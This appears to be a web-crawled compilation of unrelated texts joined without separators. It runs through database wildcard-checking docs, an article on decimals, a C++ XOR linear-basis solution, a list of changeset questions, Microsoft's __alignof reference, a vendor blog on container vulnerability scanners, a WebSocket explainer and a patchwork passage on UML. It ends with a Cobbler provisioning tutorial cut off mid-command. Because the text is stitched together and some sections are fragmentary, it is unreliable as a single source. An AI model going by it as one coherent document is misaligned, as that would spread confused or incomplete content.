Wildcard syntax can include characters that might not have any matching object names in the system.
If the syntax contains some characters that do not have a match at the position specified in any object names in the system, CheckTable checks (or excludes from checking) all the objects whose names match the specified wildcards. CheckTable also ignores the characters that do not have any matching objects. This is true of any number of wildcards.
Example 1: Assume a system contains only databases db1 and db5 but not db2, db3, and so on. Type the following:
CHECK db[125] AT LEVEL ONE;
CheckTable checks all the tables in databases db1 and db5 at level one. Since database db2 does not exist, CheckTable ignores character 2 in the wildcard syntax.
Example 2: Assume a system contains the database db1 but not db2, db3, or db4. Type the following:
CHECK db[1-4] AT LEVEL ONE;
CheckTable checks all the tables in the database db1 and ignores the remaining wildcard characters.
Multiple occurrences of the same character in the wildcard syntax are valid. If you repeat the same character in the syntax for the same position, then CheckTable recognizes the first occurrence and ignores the repeated instances. Example 1: In the following command, character b is repeated in the same position.
CHECK d[abb]1 AT LEVEL ONE;
CheckTable checks all tables in the databases da1 and db1 at level one and ignores the second instance of character b. No warning appears.
Example 2: In the following command, character 3 is specified as part of the hyphen range 1-5 and is repeated separately in the same position.
CHECK db[1-53] AT LEVEL ONE;
CheckTable checks all tables in the databases db1, db2, db3, db4, and db5 at level one. CheckTable ignores the repeated character 3.
The wildcard syntax does not apply when enclosed between apostrophes or double quotation marks. In the following command, character p is a wildcard enclosed in double quotation marks.
CHECK db1."[p]" AT LEVEL ONE;
CheckTable ignores the square brackets and checks only table “[p]”, if it exists in database db1. If table “[p]” does not exist in db1, then a warning appears.
Decimals
A decimal is a special way of writing a real number. Every fraction can be expressed as a decimal. The dot in a decimal is called the decimal point; it marks the boundary between the integer part and the fractional part of the number. A decimal whose integer part is zero is called a pure decimal; a decimal whose integer part is not zero is called a mixed decimal.
1.234 (integer part "1", decimal point ".", fractional part "234")
Properties
1. Appending or removing zeros at the end of a decimal does not change its value. For example: 0.4 = 0.400, 0.060 = 0.06.
2. Moving the decimal point n places to the right (or left) multiplies (or divides) the value by the n-th power of the base (for base ten, \(10^n\)).
Classification
Terminating decimals
A decimal with finitely many digits after the decimal point, such as 3.1465, 0.364 or 8.3218798456. All terminating decimals are rational numbers and can be written in fraction form.
A fraction in lowest terms can be written as a terminating decimal in base ten if and only if its denominator contains no prime factors other than 2 and 5. Similarly, a fraction in lowest terms has a terminating expansion in a given positive integer base if and only if the prime factors of its denominator are a subset of the prime factors of that base.
Non-terminating decimals
A decimal in which, from some position of the fractional part onward, one digit or a group of digits repeats without end is called a repeating decimal, e.g. \(\frac{1}{7}=0.142\,857\,142\,857\,142\,857\ldots\) and \(\frac{11}{6}=1.833\,333\ldots\). Repeating decimals are also rational numbers and can be written in fraction form.
A decimal whose fractional part has infinitely many digits with no digit or group of digits repeating without end is called a non-repeating infinite decimal, such as the circle constant \(\pi = 3.141\,592\,653\,589\,793\,23\ldots\) and the base of the natural logarithm \(e = 2.718\,281\,828\,459\,04\ldots\). Non-repeating infinite decimals are exactly the irrational numbers and cannot be written in fraction form.
Converting between decimals and fractions
Terminating decimal to fraction: write the digits over tenths (hundredths, and so on) and reduce.
Pure repeating decimal to fraction: the repeating block becomes the numerator; the denominator is 9 if the block has one digit, 99 if it has two digits, 999 if three, and so on. For example \(0.9999\ldots=\frac{9}{9}=1\), \(0.2525\ldots=\frac{25}{99}\), \(0.333\ldots=\frac{3}{9}=\frac{1}{3}\); reduce where possible.
Mixed repeating decimal to fraction: split it into the sum of a terminating decimal and a pure repeating decimal, then simplify; for example \(0.1333333\ldots=0.1+0.0333333\ldots=\frac{2}{15}\).
A non-repeating infinite decimal is an irrational number and cannot be converted to a fraction.
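As a small worked sketch of the pure-repeating-decimal rule above (an illustrative helper, written here in C#): a repeating block of d digits becomes block/(10^d - 1), which is then reduced by the greatest common divisor.
using System;

class RepeatingDecimal
{
    // Convert a pure repeating decimal 0.(block)(block)... to a reduced fraction.
    static (long Num, long Den) ToFraction(string block)
    {
        long numerator = long.Parse(block);        // e.g. "25" -> 25
        long denominator = 1;
        for (int i = 0; i < block.Length; i++)     // build 10^d - 1: 9, 99, 999, ...
            denominator *= 10;
        denominator -= 1;
        long g = Gcd(numerator, denominator);
        return (numerator / g, denominator / g);
    }

    static long Gcd(long a, long b) => b == 0 ? a : Gcd(b, a % b);

    static void Main()
    {
        var f = ToFraction("25"); // 0.252525... -> 25/99
        Console.WriteLine($"{f.Num}/{f.Den}");
        f = ToFraction("3");      // 0.333...    -> 1/3
        Console.WriteLine($"{f.Num}/{f.Den}");
    }
}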
Other ways of writing decimals
In some settings, such as trading markets, values are generally taken to two decimal places (regardless of which rounding rule is applied), and other ways of writing decimals have grown out of this. Take 3.14 (or 3,14) as an example:
Chinese notation
Main article: Chinese numerals
Before the Western decimal point was introduced into China, Chinese had a set of decimal units for expressing decimals[citation needed]: fen (分), li (釐), hao (毫), si (丝), hu (忽), wei (微), xian (纤) and so on, each unit being one tenth of the previous one. For example, 3.1416 is read "three and one fen, four li, one hao, six si". After the decimal point arrived from the West, these decimal units gradually fell out of use except as translations of metric prefixes; fen and li are still used for interest rates.
Notes
1. ^ Commonly seen in trading-quote software, where the fractional part is written in slightly smaller type with an underline; also on Chunghwa Post stamps, for example definitive stamp 085 "Presidential Office" [permanent dead link] and definitive stamp 136 "Berries" [permanent dead link].
2. ^ 林鹤一 (Lin Heyi) and 淡中济, translated by 黄元吉 (Huang Yuanji), Arithmetic: Integers and Decimals (《算术-整数及小数》), Wanyou Wenku, first series, first edition 1929.
Authority control
• NDL: 00572299
210. XOR Operations
Problem link
210. XOR Operations
You are given a sequence of \(N\) integers. You may select some of them (at least one) and XOR them together, obtaining many different results.
Among all the distinct results that can be obtained, what is the \(k\)-th smallest?
Input format
The first line contains an integer \(T\), the number of test cases.
For each test case, the first line contains an integer \(N\).
The second line contains \(N\) integers (each between \(1\) and \(10^{18}\)), the full sequence.
The third line contains an integer \(Q\), the number of queries.
The fourth line contains \(Q\) integers \(k_1,k_2,…,k_Q\), the values of \(k\) for the \(Q\) queries.
Output format
For each test case, the first line outputs Case #C:, where \(C\) is the test case number (starting from \(1\)).
The next \(Q\) lines describe the results of the \(Q\) queries; each line outputs one integer, the \(k_i\)-th smallest result for the \(i\)-th query.
If the total number of distinct obtainable results is less than \(k_i\), output \(-1\).
Data range
\(1 \le N,Q \le 10000\),
\(1 \le k_i \le 10^{18}\)
Sample input:
2
2
1 2
4
1 2 3 4
3
1 2 3
5
1 2 3 4 5
Sample output:
Case #1:
1
2
3
-1
Case #2:
0
1
2
3
-1
Note: if only one number is selected, the result is that number itself.
Solution idea
Linear basis
The space representable by a linear basis is the same as the space representable by the original set of vectors, so we can first compute a linear basis and use it to find the \(k\)-th smallest value. After full elimination, each basis element has a distinct highest set bit, so each basis element can be treated as one binary digit: to obtain the \(k\)-th smallest value, write \(k\) in binary and XOR together the basis elements corresponding to its set bits. One caveat: a linear basis cannot represent \(0\), so we must check whether the original vectors are linearly dependent. If the rank \(k\) of the set satisfies \(k < n\), the vectors are linearly dependent and \(0\) is obtainable; otherwise it is not.
• Time complexity: \(O(63n)\)
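For reference, here is a minimal standalone sketch (my own illustration, not part of the original solution) of the usual insertion form of a linear basis, where basis[i] holds the element whose highest set bit is bit i. Note that the full solution below goes further: it also eliminates each pivot bit from all other rows, producing a reduced basis whose elements are strictly increasing, which is what makes the k-th-smallest trick valid.

#include <cstdint>

uint64_t basis[63];

// Try to insert x into the basis; returns false if x is linearly
// dependent on the elements already inserted (x reduces to 0).
bool insert(uint64_t x) {
    for (int i = 62; i >= 0; --i) {
        if (!(x >> i & 1)) continue;              // bit i not set, keep scanning
        if (!basis[i]) { basis[i] = x; return true; }
        x ^= basis[i];                            // eliminate the highest set bit
    }
    return false;
}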
Code
// Problem: XOR Operations
// Contest: AcWing
// URL: https://www.acwing.com/problem/content/description/212/
// Memory Limit: 32 MB
// Time Limit: 1000 ms
//
// Powered by CP Editor (https://cpeditor.org)
// %%%Skyqwq
#include <bits/stdc++.h>
//#define int long long
#define help {cin.tie(NULL); cout.tie(NULL);}
#define pb push_back
#define fi first
#define se second
#define mkp make_pair
using namespace std;
typedef long long LL;
typedef pair<int, int> PII;
typedef pair<LL, LL> PLL;
template <typename T> bool chkMax(T &x, T y) { return (y > x) ? x = y, 1 : 0; }
template <typename T> bool chkMin(T &x, T y) { return (y < x) ? x = y, 1 : 0; }
template <typename T> void inline read(T &x) {
int f = 1; x = 0; char s = getchar();
while (s < '0' || s > '9') { if (s == '-') f = -1; s = getchar(); }
while (s <= '9' && s >= '0') x = x * 10 + (s ^ 48), s = getchar();
x *= f;
}
const int N=10005;
int t,n,k,q;
LL x,a[N];
int main()
{
    scanf("%d",&t);
    for(int T=1;T<=t;T++)
    {
        printf("Case #%d:\n",T);
        scanf("%d",&n);
        for(int i=0;i<n;i++)scanf("%lld",&a[i]);
        k=0;                               // rank: number of basis rows found so far
        for(int i=62;i>=0;i--)             // Gaussian elimination over GF(2), highest bit first
        {
            for(int j=k;j<n;j++)           // find a row with bit i set, move it to row k
                if(a[j]>>i&1)
                {
                    swap(a[k],a[j]);
                    break;
                }
            if(!(a[k]>>i&1))continue;      // no pivot for this bit
            for(int j=0;j<n;j++)           // clear bit i in every other row (reduced form)
                if(j!=k&&(a[j]>>i&1))a[j]^=a[k];
            k++;
            if(k==n)break;
        }
        reverse(a,a+k);                    // ascending order: a[0] has the lowest high bit
        bool f=k<n;                        // rank < n means 0 is representable
        scanf("%d",&q);
        while(q--)
        {
            scanf("%lld",&x);
            x-=f;                          // if 0 is representable, it is the 1st smallest
            if(x>=(1ll<<k))                // only 2^k distinct values exist
            {
                puts("-1");
                continue;
            }
            LL res=0;
            for(int i=0;i<k;i++)           // binary digits of x select basis rows
                if(x>>i&1)res^=a[i];
            printf("%lld\n",res);
        }
    }
    return 0;
}
Source: https://www.cnblogs.com/zyyun/p/16531957.html
A changeset is a set of changes between revisions of files under revision control, which should be treated as an indivisible group (i.e., an atomic package).
73 votes · 9 answers · 12k views
With Mercurial, how can I “compress” a series of changesets into one before pushing?
Let's say I have a local and a remote Mercurial repository. Now, I start working on a feature. I work on it, and when I think it's done, I commit the changeset. Testing it a bit more, I find that I ...
10 votes · 3 answers · 1k views
Injecting mercurial changeset as version information in a C executable
I would like the executables for a project I am working on to have the latest mercurial changeset recorded so that when a user complains about buggy behavior, I can track which version they are using. ...
6 votes · 1 answer · 760 views
View TFS changeset details in console
I am using TFS and want to view all changes on a changeset that contains changes in several files. Viewing this in the GUI is not efficient as I have to open every single file. What I want to do is to ...
10 votes · 4 answers · 7k views
How do I figure out which changeset a label in TFS was applied to?
We're using Team Foundation Server and we are using Labels to create points in our version history where specific versions (either internal or external) were produced. Right now we were wondering if ...
6 votes · 2 answers · 3k views
TFS: List changesets that have not been merged
Environment TFS 2010. Three branches: Main, Development and Release. Question I would like to easily retrieve a list of changesets that have not been fully merged into all three branches. For ...
3 votes · 1 answer · 1k views
How to merge TFS change sets programmatically?
I know how to merge a change set in TFS 2010 using the command line command "tf merge". Is there a way I can do this in C# with code. I want to merge specific change sets only (cherry pick), one at ...
40 votes · 4 answers · 19k views
Mercurial - all files that changed in a changeset?
How can you determine all the files that changed in a given changeset? I'm not looking for a diff in this case, just a list of add/remove/modifications. hg log -vprX does a list of diffs but I ...
7 votes · 4 answers · 5k views
How can I extract all changed files of a changeset in Mercurial?
Until recently we have been using SVN for all projects of our web studio, and there is a very convenient feature present in several clients like Subversive and TortoiseSVN that can extract all files ...
8 votes · 5 answers · 7k views
Java: how to get mercurial current changeset number for use in program
I've recently started using mercurial for version control in a Java project. When I run my program, the input parameters it has used to produce a certain output are written to a specific file. It ...
11 votes · 1 answer · 1k views
How to compare sets of changesets between 2 Mercurial branches?
I've got a (remote) Hg repository with a couple branches. I want to verify that branch A has every changeset that branch B has (it may have more, and that's OK). Is there an easy way to do this with ...
16 votes · 6 answers · 9k views
How can I open a single changeset in TFS from within Visual Studio
Someone emailed me a TFS changeset ID and now I am trying to open this single changeset. Is there an easy way to do this from within Visual Studio (VS 2008 if it matters)?
12 votes · 5 answers · 5k views
Getting TFS to put the changeset in the assembly version
I have got a Team Foundation Server Build running cleanly. It produces several assemblies and I would like the assemblies versions to have the last number to be the changset number. That is, if I ...
5 votes · 3 answers · 857 views
List SIZE of mercurial changesets?
Looking to quantify how much change happened in each changeset. Any quick way to list maybe kb diff between two revisions?
4 votes · 3 answers · 2k views
A way to find out all affected files of a workItem or group of chgsets in TFS 2008?
I'm trying to figure out a way to find out which files were affected by a work item in TFS 2008. I realize that this is a duplication of a question already asked by someone else here - ...
4 votes · 2 answers · 1k views
convert changeset(s) to shelveset
Is it possible to create a shelveset from the diff of two versions of one branch just by some operations in tfs/tfpt? e.g. create a shelveset from (changeset 2013 -> changeset 2034)
1 vote · 1 answer · 2k views
View a list of all files changed as part of a Workitem in TFS
If I am checking in code against a workitem, on each check in a changeset is created. I can view the links tab of the workitem and then view each changeset to see the files that have been changed. ...
5 votes · 1 answer · 3k views
How and where does TFS 2008 / TFS 2010 store changesets?
I am attempting to understand how TFS 2008 (and 2010 if it's different) store and communicate details of a set of changes in a changeset. Now when I commit to a Subversion hosted project, the client ...
3 votes · 1 answer · 126 views
What exactly is a Mercurial changeset?
If you pull down a changeset are you pulling down the full copy of all files that were changed in the changeset? Or are you pulling down some type of diff report which Mercurial will then apply to ...
2 votes · 2 answers · 714 views
Is there a way to show the TFS changeset number after a check-in?
Is there a way, with power tools or other extensions, to make it so that the changeset number is displayed in an alert? Currently it displays on the status bar, but disappears after a while, or at ...
2 votes · 1 answer · 262 views
Difference between a changeset and a patch?
What is the difference between a changeset and a patch? I was using hg today and I noticed the import command mentions that it is used to "import an ordered set of patches." What is a patch?
2 votes · 2 answers · 774 views
Mercurial Subrepos, how to control which changeset I want to use for a subrepo?
I am reading up on subrepos, and have been running some tests locally, seems to work OK so far, but I have one question. How do I specify/control which changeset I want to use for a particular ...
0 votes · 1 answer · 596 views
Define Changeset for insert query in liquibase
I have two table as following : CREATE TABLE StudentMaster ( sId SERIAL, StudentName VARCHAR(50) ); CREATE TABLE StudentClassMap ( studnetId BIGINT UNSIGNED NOT NULL, studentClass ...
__alignof Operator
Microsoft Specific
Returns a value, of type size_t, that is the alignment requirement of the type.
__alignof( type )
For example:
Expression              Value
__alignof( char )       1
__alignof( short )      2
__alignof( int )        4
__alignof( __int64 )    8
__alignof( float )      4
__alignof( double )     8
__alignof( char* )      4
The __alignof value is the same as the value for sizeof for basic types. Consider, however, this example:
typedef struct { int a; double b; } S;
// __alignof(S) == 8
In this case, the __alignof value is the alignment requirement of the largest element in the structure.
Similarly, for
typedef __declspec(align(32)) struct { int a; } S;
__alignof(S) is equal to 32.
One use for __alignof would be as a parameter to one of your own memory-allocation routines. For example, given the following defined structure S, you could call a memory-allocation routine named aligned_malloc to allocate memory on a particular alignment boundary.
typedef __declspec(align(32)) struct { int a; double b; } S;
int n = 50; // array size
S* p = (S*)aligned_malloc(n * sizeof(S), __alignof(S));
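As a hedged aside that is not part of the original Microsoft documentation: standard C++11 provides the portable alignof operator and the alignas specifier, which report and control the same alignment requirements. A minimal sketch:

#include <iostream>

struct alignas(32) S { int a; double b; };

int main() {
    // Standard C++11 alignof; yields the same values as the
    // Microsoft-specific __alignof for these types.
    std::cout << alignof(S) << '\n';       // 32
    std::cout << alignof(double) << '\n';  // typically 8
}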
For more information on modifying alignment, see align and #pragma pack.
END Microsoft Specific
See Also
Expressions with Unary Operators | C++ Keywords
Container Vulnerability Scanning: Top 5 Tools
Written by Mahendra D. | August 17, 2023 | 8 min read
In software engineering, containers have evolved as fundamental elements for bundling, disseminating, and executing applications. These compact and self-contained executable packages house everything needed to run software, from the code itself to system tools, libraries, and configurations. Nevertheless, as with technological innovation, they are not immune to threats and require specific steps to ensure security. This brings us to the critical aspect of container vulnerability scanning.
Container vulnerability scanning is a critical component of any cyber-defense blueprint; it focuses on detecting, categorizing, and prioritizing weak spots in computer systems, software, and network infrastructures. This offers vital visibility into potential threats that could undermine the system’s security, thus paving the way for suitable remediation strategies.
In this piece, we delve deep into Container Vulnerability Scanning – a fusion of the above-mentioned concepts, where we scrutinize potential vulnerabilities inherent to containers. We will elaborate on the types of container vulnerabilities, how they can materialize, various container vulnerability scanning methodologies, and finally, suggest the top five tools for effective container vulnerability scanning.
What is Container Vulnerability Scanning?
Container vulnerability scanning is a specific kind of vulnerability scanning focused on unearthing security risks in container images. You can think of container images as the blueprint from which containers spring into action, complete with the application and its sidekicks, aka dependencies. If there’s a chink in this blueprint, each container derived from it will inherit that chink. That’s why spotting and patching vulnerabilities right at the source – the image level – is essential for keeping a container environment safe.
Now, let’s chat about how this scanning works. It’s like giving a container image a thorough health check to find known vulnerabilities. These could be hiding anywhere within the container – in the application code, system libraries, or other dependencies. This check-up usually happens automatically and uses a database chock full of known security issues to compare with the contents of a container image.
But there’s something important to remember here. Container vulnerability scanning isn’t something you do once and forget about. It needs to be woven into the fabric of the software development process. The ideal way to do this is to run scans at every stage – when crafting images, just before you launch them, and constantly after they’re live. That way, even if new vulnerabilities pop up after a container is live, they can be tracked down and tackled quickly, helping to make your application environment more secure overall.
What are the Different Types of Container Vulnerabilities?
Container technologies, while revolutionizing software deployment, bring new vulnerabilities that can compromise your system’s security. Understanding the diverse types of container vulnerabilities is the first step in devising an effective security strategy.
1. Image Vulnerabilities
These are probably the ones you’ll encounter most frequently. They spring up when the images used to mold containers are either out-of-date or insecure. Picture an image as a sort of container clone – it’s a blueprint that becomes a live container. If this blueprint carries old software packages or libraries known to be riddled with security flaws, those same flaws will infiltrate the living container.
So, how can you tackle these vulnerabilities? One approach is to ensure your images are regularly spruced up with the freshest, safest versions of software and libraries. And let’s not forget about container vulnerability scanning tools – they’re excellent at pinpointing the risks within your container images.
2. Runtime Vulnerabilities
These security issues crop up while a container is actively running. Think of apps operating with privileges they don’t need, containers set up with flimsy configurations, or unsecured runtime settings for containers.
It’s wise to stick to the principle of least privilege or PoLP to put a lid on runtime vulnerabilities. In a nutshell, your applications should only be armed with the bare minimum of permissions they need to operate effectively. Adhering to good practices for securely setting up containers can go a long way. Don’t underestimate the power of runtime security tools, either – they’re great at monitoring container behavior, spotting, and dealing with these risks before they can cause trouble.
3. Orchestrator Vulnerabilities
These spring up in the management systems that keep the containers in check, like Kubernetes or Docker Swarm. Remember, an orchestrator is a boss – it has the power to start, pause, and network containers. If a hacker manages to take the reins of the orchestrator, they could wreak havoc on your entire container landscape.
How to fend off orchestrator vulnerabilities? Start by buttoning up access to the orchestrator. Ensure that only the right people have access, and keep that list as short as possible. Staying up to date with orchestrator software is also crucial – don’t let old, insecure versions expose you to unnecessary risk. And, of course, always use robust authentication methods. Stay vigilant with these orchestrator security best practices to significantly lower this risk.
4. Supply Chain Vulnerabilities
These issues occur when bad actors get their way into the software supply chain, and like a wolf in sheep’s clothing, they lace malicious code into open-source libraries or components. These elements can then find their way into your container images without raising any alarms.
Dealing with this type of vulnerability requires a keen eye because it’s not just about scrutinizing your code – you must go beyond that. Every library and component your application uses must be put under the microscope. A strong software composition analysis tool, capable of scanning every single component of your software, becomes an essential ally in your security arsenal to ward off this threat.
Importance of Container Vulnerability Scanning
With the rise in popularity of containerization technologies, the security of these containers has become paramount. Container Vulnerability Scanning is a critical practice that every organization should adopt to ensure the safety of their software and data. Here, we’ll discuss three main reasons why Container Vulnerability Scanning is essential.
1. Early Detection of Vulnerabilities
Regular container vulnerability scanning allows organizations to catch vulnerabilities at the earliest stages of the software development cycle. Detecting and nipping these issues in the bud before they have a chance to become a real headache saves both time and resources that might have otherwise been drained fixing post-deployment issues. Not just that, but it also minimizes potential damage that could spiral out of unchecked vulnerabilities.
With early detection, the number of containers with chinks in their armor that manage to infiltrate the production environment is drastically cut down. Consequently, this reduces the overall risk profile of an organization’s software infrastructure, making the services they roll out to users considerably more secure.
2. Compliance with Regulations
Many industries have stringent regulations, compelling companies to conduct regular vulnerability evaluations of their IT systems. In settings where containers are an integral part of the framework, container vulnerability scanning takes center stage in these assessments.
Carrying out routine scans has the added benefit of furnishing necessary documentation, and demonstrating compliance with the regulations. It provides organizations with a solid method to assure regulators that they leave no stone unturned to shield their IT systems from identified vulnerabilities.
3. Keeping Up with Threat Landscape
We’re living in a world where the threat landscape isn’t static; it’s always shifting, with new vulnerabilities coming to light and older ones getting patched up. Regular container vulnerability scanning lets organizations stay in sync with these incessant changes.
By routinely updating their vulnerability databases and scanning their containers, organizations can be confident they are protected against the most recently disclosed threats. This practice also helps keep their systems secure as new updates and patches roll out.
Types of Container Vulnerability Scanning
Different strategies and tools are required in cybersecurity to keep up with the ever-evolving threat landscape. This also holds for container vulnerability scanning, where different types cater to various aspects of container security. Here, we dive into four main types of container vulnerability scanning.
1. Static Analysis
Also known as Static Application Security Testing (SAST), Static Analysis scans container images without launching them. This examination sifts through the code, libraries, and dependencies housed in the image, searching for recognized vulnerabilities.
The benefit of this approach is that it uncovers vulnerabilities at an early stage in the development cycle, even before the containers are dispatched. It can seamlessly integrate into the Continuous Integration/Continuous Deployment (CI/CD) pipeline, enabling automated examinations during the build phase.
2. Dynamic Analysis
Dynamic Analysis, or Dynamic Application Security Testing (DAST), evaluates running containers for potential weak spots. It offers a real-time snapshot of how containers behave and perform, thereby aiding the identification of problems that may only crop up during runtime.
This examination is particularly handy in spotting vulnerabilities associated with runtime settings and configuration, which might not be discernible in static analysis. It’s also adept at identifying insecure inter-container communication and potential container breakout vulnerabilities.
3. Software Composition Analysis
Software Composition Analysis (SCA) is an approach that inspects the open-source components incorporated into container images. It pinpoints recognized vulnerabilities in these elements that could compromise the containers’ security.
Considering the extensive adoption of open-source tools and libraries in software development, SCA has emerged as a pivotal part of container vulnerability scanning. It fortifies the software supply chain, guaranteeing that the open-source components deployed in your containers are devoid of known vulnerabilities.
4. Runtime Protection
Runtime protection implies overseeing the behavior of active containers to discern any irregularities that might signal a security risk. It leverages preset rules or machine learning algorithms to spot actions that deviate from the expected behavior.
This scanning is vital to intercepting threats that may have been missed during static or dynamic analysis. It offers uninterrupted security for your containers, assuring that any emerging threats are detected immediately as they appear.
Top 5 Tools for Container Vulnerability Scanning
Choosing the right tool for container vulnerability scanning is vital for effective security. The tool should identify vulnerabilities and offer comprehensive features to mitigate and manage those vulnerabilities. Here, we list the top 5 commercial tools for container vulnerability scanning.
1. PingSafe
PingSafe is a potent tool built to safeguard your containerized environments, honing in on Kubernetes, Docker, and serverless security. It boasts an extensive set of features, such as:
• Examining and supervising containers like ECS, AKS, EKS, Fargate, Kubernetes, Docker images, etc., and orchestration components for potential vulnerabilities.
• Identifying container configuration flaws against renowned standards like CIS, PCI, etc., ensuring your container configurations align with industry best practices.
• Spotting concealed secrets in container images and host VMs, aiding in preventing unauthorized access to confidential information.
• Capability to find vulnerabilities in container images housed in ECS/Kubernetes clusters and private container registries, offering a thorough vulnerability evaluation.
• Graph-based depiction of ECS/Kubernetes clusters, facilitating easy comprehension and control of your container environment.
2. Aqua Security
Aqua Security is a top-tier container security instrument that delivers container image scanning and runtime protection. It boasts features such as:
• Thorough scanning of container images for known vulnerabilities.
• Identification of misconfigurations in container deployments.
• Synchronization with CI/CD pipelines for early detection and remediation of vulnerabilities.
3. Sysdig Secure
Sysdig Secure is a tool crafted specifically for container and Kubernetes security. It proposes features like:
• Scanning of container images located in registries and within CI/CD pipelines.
• Detection of runtime threats based on pre-established rules and machine learning.
• Detailed forensics and audit trails for containers.
4. Twistlock by Prisma Cloud (Palo Alto Networks)
Twistlock, incorporated within Prisma Cloud, is a holistic cloud-native security platform. It provides features such as:
• Scanning for vulnerabilities in container images and serverless functions.
• Runtime defense mechanisms for both containers and hosts.
• Compliance verification and enforcement are rooted in industry standards.
5. StackRox
Now under the Red Hat umbrella, StackRox provides a security platform built specifically for Kubernetes. Its offered features encompass:
• Scanning for vulnerabilities within images in both registries and deployments.
• Spotting hazardous configurations and deployments that don’t comply with the rules.
• Utilizing machine learning for threat detection during runtime.
These applications offer a well-rounded strategy for container vulnerability scanning, including various features designed to spot and manage vulnerabilities in your containerized setups. The appropriate tool for you will depend on the unique needs of your organization and the nature of your container deployment.
Conclusion
In sum, safeguarding your containerized applications is indispensable to current software development. Incorporating Container Vulnerability Scanning through efficient tools can substantially fortify your resistance against potential hazards. Recognizing diverse vulnerabilities and applying the best practices can notably diminish the risk levels associated with your containerized applications.
For those seeking an all-encompassing solution to fortify your containerized settings, PingSafe is worth considering. Offering a broad range of features, from scanning both server-based and serverless containers to spotting configuration flaws and hidden secrets, PingSafe delivers a sturdy and exhaustive approach to container security. Don’t delay; make the initial move toward securing your containerized settings with PingSafe today.
Why WebSockets gain popularity?
Web applications are becoming more and more interactive. They do not resemble static web pages anymore. That is why they require functionality like instant messaging, user status updates, real time data view, peer to peer interaction, etc. Until recently, the most common way of such communication was polling via HTTP – the most simple but not very effective way, and here is why.
1. A server cannot message a user directly; it can only process and respond to a client's request. In order to receive updates, clients send requests all the time, and in most cases the server responds "nothing new". The server is loaded with these numerous iterations without any useful information actually being transferred.
2. HTTP allows client requests and server responses go only in successive manner, one after another.
3. HTTP requests and responses include headers that may be very long if cookie values are passed. They are transferred with each request and response and do not carry any useful data.
As a result, communication is not instant, and there is significant server load, which grows dramatically for large numbers of users and may bring down the application. There were attempts to solve these problems, but these were patches and hacks rather than truly elegant solutions.
Long Polling was aimed at reducing the number of request-response iterations. Unlike traditional polling, a user request has a timeout, staying open for a certain time. The server responds to this request only if an event happens. If nothing happens during the given period, the server responds, closing the request. Then a new request can be issued. From the client side, events happen almost in real time, but a slight delay may occur between requests. For the server, this reduces the number of request-response iterations, but the problem of redundant headers remains. Also, long polling requires sufficient memory to keep a number of idle connections open: one for each user.
Server-Sent Events protocol works in a similar way to long polling, but the connection stays open even after an event is sent to user. This reduces server load, but the connection is one way, which is fine for displaying changing values, but is not sufficient for messaging.
WebSocket technology was introduced in 2011 and became a breakthrough. Unlike the other solutions, it provides bidirectional, full-duplex communication between server and client over a single TCP connection. WebSocket does not require the request-response routine, allowing both client and server to message each other instantly after the initial handshake. Each message is framed with as little as 2 bytes of overhead instead of bulky HTTP headers. Client and server can talk independently, each able to send and receive information at the same time.
As you can see, with WebSocket you have no redundant requests and responses and no extra load; only the necessary bytes are sent. This reduces delays and server load vastly, allowing web applications to perform modern tasks in the most effective way.
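To make the contrast with HTTP polling concrete, here is a minimal synchronous client sketch in C++ using Boost.Beast. It is an illustration under assumptions: the echo host name is hypothetical, error handling is omitted, and a production client would use the asynchronous API.

#include <boost/asio/connect.hpp>
#include <boost/asio/ip/tcp.hpp>
#include <boost/beast/core.hpp>
#include <boost/beast/websocket.hpp>
#include <iostream>
#include <string>

namespace beast = boost::beast;
namespace net = boost::asio;
using tcp = net::ip::tcp;

int main() {
    net::io_context ioc;
    tcp::resolver resolver{ioc};
    beast::websocket::stream<tcp::socket> ws{ioc};

    // One TCP connection plus one HTTP Upgrade handshake...
    auto const results = resolver.resolve("echo.example.com", "80"); // hypothetical host
    net::connect(ws.next_layer(), results);
    ws.handshake("echo.example.com", "/");

    // ...then either side may send frames at any time, each with only a
    // few bytes of framing instead of full HTTP headers.
    ws.write(net::buffer(std::string("hello")));
    beast::flat_buffer buffer;
    ws.read(buffer);
    std::cout << beast::make_printable(buffer.data()) << std::endl;

    ws.close(beast::websocket::close_code::normal);
}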
The WebSocket protocol is currently supported by most major browsers, including Google Chrome, Microsoft Edge, Internet Explorer, Firefox, Safari and Opera. So there are no compatibility issues. And this makes it the best universal solution to date.
The class and object notations in UML look alike, which is a common source of confusion. A class diagram shows classes, their attributes and operations, and the relationships between classes; it is the main building block of object-oriented modeling. The UML representation of a class is a rectangle with three stacked compartments: the class name on top, the attributes in the middle (each attribute on a separate line), and the operations at the bottom. A class whose functionality is not defined is called an abstract class; UML marks it by italicizing the class name.
The relationship notations are the most frequently misunderstood part, in particular the differences between association, aggregation, and composition. By default, an association between classes is bi-directional; an arrowhead turns it into a directed association, indicating the direction of the link. Aggregation is a special type of association in which objects are assembled or configured together to create a more complex object, describing a group of objects whose parts can exist independently of the whole; composition additionally implies ownership, with the container-contained relationship marked at the container end.
Related diagram types reuse similar notation. An object diagram is a structural diagram that uses notation similar to class diagrams but depicts concrete instances, using real-world examples to show the state of the system at a particular point in time. Sequence diagrams (also called event diagrams) show interactions over time. In activity diagrams, a small filled circle followed by an arrow represents the initial state or start point; for activity diagrams using swimlanes, the start point is placed in the top-left corner of the first column. Stereotypes are written between guillemets (<< >>), and notes can be attached to elements to annotate the diagram. A classic worked example is a class diagram for a hotel management system, showing the relationships between guest information, staff responsibilities, and room occupancy.
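Since the association / aggregation / composition distinction trips people up most, here is a small hedged C++ sketch (the class names are my own illustration, not from any of the quoted guides) showing how the three relationships typically map to code:

class Engine { };
class Driver { };

class Car {
    Engine engine_;                 // composition: the Car owns its Engine;
                                    // the part is created and destroyed with the whole
    Driver* driver_ = nullptr;      // aggregation: the Car uses a Driver that
                                    // exists independently of the Car
public:
    void assign(Driver* d) { driver_ = d; }
    void honkAt(const Driver&) { }  // association: a transient link between
                                    // otherwise independent classes
};

int main() {
    Driver alice;
    Car car;            // the Engine comes and goes with the Car (composition)
    car.assign(&alice); // the Driver outlives any Car it is attached to (aggregation)
    car.honkAt(alice);  // a plain association via a parameter
}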
Overview: After the Cobbler server has been set up, we first need to create a VM and obtain its MAC address. Cobbler identifies hosts by MAC address when applying per-host custom configuration.
Environment:
CentOS Linux release 7.6.1810
VMware Workstation Pro 14
Create a new VM
Its MAC address is 00:50:56:3E:F0:C6
When installing the system through Cobbler, specify the host's IP address, image, gateway, hostname, and other settings:
[root@localhost kickstarts]# pwd
/var/lib/cobbler/kickstarts
[root@Jaking kickstarts]# cobbler system add \
--name=Jaking-custom \
--mac=00:50:56:3E:F0:C6 \
